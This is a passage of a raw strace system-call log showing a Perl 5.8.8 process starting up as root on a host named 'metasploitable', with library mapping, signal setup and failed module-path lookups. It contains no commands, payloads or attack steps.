\4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

5824  07:10:52.730906 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

5824  07:10:52.730923 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e04000

5824  07:10:52.730934 mmap2(0xb7e0d000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7e0d000

5824  07:10:52.730949 mmap2(0xb7e0f000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7e0f000

5824  07:10:52.730962 close(1)          = 0

5824  07:10:52.730986 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e03000

5824  07:10:52.730999 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e038c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

5824  07:10:52.731071 mprotect(0xb7f7f000, 4096, PROT_READ) = 0

5824  07:10:52.731097 munmap(0xb7fc7000, 29913) = 0

5824  07:10:52.731110 set_tid_address(0xb7e03908) = 5824

5824  07:10:52.731120 set_robust_list(0xb7e03910, 0xc) = 0

5824  07:10:52.731129 futex(0xbff9e430, 0x81 /* FUTEX_??? */, 1) = 0

5824  07:10:52.731143 rt_sigaction(SIGRTMIN, {0xb7f892c0, [], SA_SIGINFO}, NULL, 8) = 0

5824  07:10:52.731156 rt_sigaction(SIGRT_1, {0xb7f89340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

5824  07:10:52.731169 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

5824  07:10:52.731182 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

5824  07:10:52.731201 uname({sys="Linux", node="metasploitable", ...}) = 0

5824  07:10:52.731329 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

5824  07:10:52.731376 brk(0)            = 0x8153000

5824  07:10:52.731385 brk(0x8174000)    = 0x8174000

5824  07:10:52.731428 getuid32()        = 0

5824  07:10:52.731438 geteuid32()       = 0

5824  07:10:52.731447 getgid32()        = 0

5824  07:10:52.731456 getegid32()       = 0

5824  07:10:52.731493 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7de2000

5824  07:10:52.731519 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1

5824  07:10:52.731536 read(1, "\34\312\273\24", 4) = 4

5824  07:10:52.731550 close(1)          = 0

5824  07:10:52.731568 time(NULL)        = 1495624252

5824  07:10:52.731612 stat64("/usr/local/lib/site_perl/5.8.8/i486-linux-gnu-thread-multi", 0xbff9e100) = -1 ENOENT (No such file or directory)

5824  07:10:52.731630 stat64("/usr/local/lib/site_perl/5.8.8", 0xbff9e100) = -1 ENOENT (No such file or directory)

5824  07:10:52.731642 stat64("/usr/local/lib/site_perl/i486-linux-gnu-thread-multi", 0xbff9e100) = -1 ENOENT (No such file or directory)

5824  07:10:52.731658 stat64("/usr/local/lib/perl/5.8.7", 0xbff9e240) = -1 ENOENT (No such file or directory)

5824  07:10:52.731670 stat64("/usr/local/share/perl/5.8.7", 0xbff9e240) = -1 ENOENT (No such file or directory)

5824  07:10:52.731683 stat64("/usr/local/lib/perl/5.8.6", 0xbff9e240) = -1 ENOENT (No such file or directory)

5824  07:10:52.731698 stat64("/usr/local/share/perl/5.8.6", 0xbff9e240) = -1 ENOENT (No such file or directory)

5824  07:10:52.731709 stat64("/usr/local/lib/perl/5.8.4", 0xbff9e240) = -1 ENOENT (No such file or directory)

5824  07:10:52.731721 stat64("/usr/local/share/perl/5.8.4", 0xbff9e240) = -1 ENOENT (No such file or directory)

5824  07:10:52.731733 stat64("/usr/local/lib/perl/5.8.3", 0xbff9e240) = -1 ENOENT (No such file or directory)

5824  07:10:52.731744 stat64("/usr/local/share/perl/5.8.3", 0xbff9e240) = -1 ENOENT (No such file or directory)

5824  07:10:52.731756 stat64("/usr/local/lib/perl/5.8.2", 0xbff9e240) = -1 ENOENT (No such file or directory)

5824  07:10:52.731767 stat64("/usr/local/share/perl/5.8.2", 0xbff9e240) = -1 ENOENT (No such file or directory)

5824  07:10:52.731779 stat64("/usr/local/lib/perl/5.8.1", 0xbff9e240) = -1 ENOENT (No such file or directory)

5824  07:10:52.731790 stat64("/usr/local/share/perl/5.8.1", 0xbff9e240) = -1 ENOENT (No such file or directory)

5824  07:10:52.731832 stat64("/usr/local/lib/perl/5.8.0", 0xbff9e240) = -1 ENOENT (No such file or directory)

5824  07:10:52.731861 stat64("/usr/local/share/perl/5.8.0", 0xbff9e240) = -1 ENOENT (No such file or directory)

5824  07:10:52.731884 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbff9df38) = -1 ENOTTY (Inappropriate ioctl for device)

5824  07:10:52.731898 _llseek(0, 0, [0], SEEK_CUR) = 0

5824  07:10:52.731910 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbff9df38) = -1 EBADF (Bad file descriptor)

